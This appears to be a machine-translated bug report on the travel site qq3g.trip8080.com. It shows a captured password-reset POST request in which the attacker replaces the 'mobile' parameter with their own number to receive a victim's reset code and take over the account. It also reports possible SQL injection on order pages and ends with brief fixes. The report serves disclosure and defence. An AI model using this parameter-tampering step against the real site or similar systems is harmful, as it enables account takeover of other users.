The problematic site is "changtu network-3G colorful version-QQ mobile browser cooperative version "! Domain Name: qq3g.trip8080.com 1. click forgot password; 2. enter the username to be retrieved. 3. during registration, changtu needs to enter a mobile phone number for verification. Therefore, each user is bound to a mobile phone number and uses the mobile phone number to retrieve the password. 4. click the phone to retrieve the password and capture the packet; POST/user/findPwdMobile.htm HTTP/1.1 Host: qq3g. trip8080.comProxy-Connection: keep-aliveContent-Length: 25Cache-Control: max-age = 0 Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 Origin: http://qq3g.trip8080.comUser-Agent : Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://qq3g.trip8080.com/user/findPwdType.htmAccept-Encoding : Gzip, deflate, sdchAccept-Language: zh-CN, zh; q = 0.8 Cookie :... mobile = 135 ........ & email = 5. here we change the value of the "mobile" parameter to "136" for the attacker's mobile phone number ....... "and submit; 6. the system does not verify whether the mobile phone number belongs to this user. As a result, the attacker successfully receives the verification code and enters the verification code to the password reset stage. enter the password! In addition, it is found that SQL Injection exists, and post requests can be submitted in get mode, which does not strictly filter user input, but is not easy to use! Order query; order payment:
Solution:
1) strictly verify the user identity! 2) filter user input!